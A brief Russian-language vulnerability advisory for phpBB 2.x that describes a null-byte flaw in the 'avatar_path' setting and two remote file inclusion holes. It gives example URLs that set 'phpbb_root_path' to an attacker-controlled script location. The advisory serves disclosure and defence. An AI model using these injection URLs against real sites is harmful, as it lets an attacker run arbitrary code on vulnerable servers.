Программа: phpBB 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "avatar_path" сценарием admin/admin_board.php перед использованием в качестве конфигурационной переменной для сохранения картинок. Злоумышленник может задать в параметре "avatar_path" файл с нулевым байтов в конце, что позволит выполнить произвольный сценарий на уязвимой системе.
2) Уязвимость существует из-за недостаточной обработки входных данных в параметре " phpbb_root_path " сценарием functions_static_topics.php.
Пример:
http://www.site.com/[path]/includes/functions_static_topics.php? phpbb_root_path=[Evil_Script]
3) Уязвимость существует из-за недостаточной обработки входных данных в параметре " setmodules" сценарием admin_topic_action_logging.php.
Пример:
http://site.com/[path]/admin/admin_topic_action_logging.php? setmodules=pagestart&phpbb_root_path=http://[Evil_script]